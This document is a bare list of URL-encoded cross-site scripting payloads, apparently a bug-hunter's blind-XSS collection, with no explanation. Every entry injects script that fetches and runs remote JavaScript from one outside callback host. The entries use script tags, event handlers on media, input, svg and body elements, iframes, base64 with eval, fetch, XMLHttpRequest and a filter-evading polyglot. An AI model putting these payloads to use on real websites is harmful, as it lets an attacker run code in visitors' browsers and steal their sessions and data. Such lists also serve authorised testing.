'%22%3E%3Cscript%20src=https://xss.report/c/v3n0msec%3E%3C/script%3E

javascript:eval('var%20a=document.createElement(%5C'script%5C');a.src=%5C'https://xss.report/c/v3n0msec%5C';document.body.appendChild(a)')

%22%3E%3Cvideo%3E%3Csource%20onerror=eval(atob(this.id))%20id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3YzbjBtc2VjIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;%3E

%3Cscript%3Efunction%20b()%7Beval(this.responseText)%7D;a=new%20XMLHttpRequest();a.addEventListener(%22load%22,%20b);a.open(%22GET%22,%20%22//xss.report/c/v3n0msec%22);a.send();%3C/script%3E

var%20a=document.createElement(%22script%22);a.src=%22https://xss.report/c/v3n0msec%22;document.body.appendChild(a);

%3Csvg%20onload=%22javascript:eval('var%20a=document.createElement(%5C'script%5C');a.src=%5C'https://xss.report/c/v3n0msec%5C';document.body.appendChild(a)')%22%20/%3E

%3Cdiv%20onmouseover=%22var%20a=document.createElement('script');a.src='https://xss.report/c/v3n0msec';document.body.appendChild(a)%22%3EHover%20me%3C/div%3E

%3Cbody%20onload=%22var%20a=document.createElement('script');a.src='https://xss.report/c/v3n0msec';document.body.appendChild(a)%22%3E

%22%3E%3Cimg%20src=x%20id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3YzbjBtc2VjIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;%20onerror=eval(atob(this.id))%3E

%22%3E%3Cinput%20onfocus=eval(atob(this.id))%20id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL3YzbjBtc2VjIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;%20autofocus%3E

%22%3E%3Ciframe%20srcdoc=%22&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;xss.report/c/v3n0msec&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;%22%3E

%3Cscript%3E$.getScript(%22//xss.report/c/v3n0msec%22)%3C/script%3E

javascript:%22/*'/*%60/*--%3E%3C/noscript%3E%3C/title%3E%3C/textarea%3E%3C/style%3E%3C/template%3E%3C/noembed%3E%3C/script%3E%3Chtml%20%22%20onmouseover=/*&lt;svg/*/onload=(import(/https:%5Cxss.report%5Cc%5Cv3n0msec/.source))//%3E

%3Ciframe%20src=%22javascript:var%20a=document.createElement('script');a.src='https://xss.report/c/v3n0msec';document.body.appendChild(a)%22%3E%3C/iframe%3E

%3Caudio%20src=%22x%22%20onerror=%22var%20a=document.createElement('script');a.src='https://xss.report/c/v3n0msec';document.body.appendChild(a)%22%3E

%3Cscript%3Efetch(%22//xss.report/c/v3n0msec%22).then(r=%3Er.text()).then(t=%3Eeval(t))%3C/script%3E

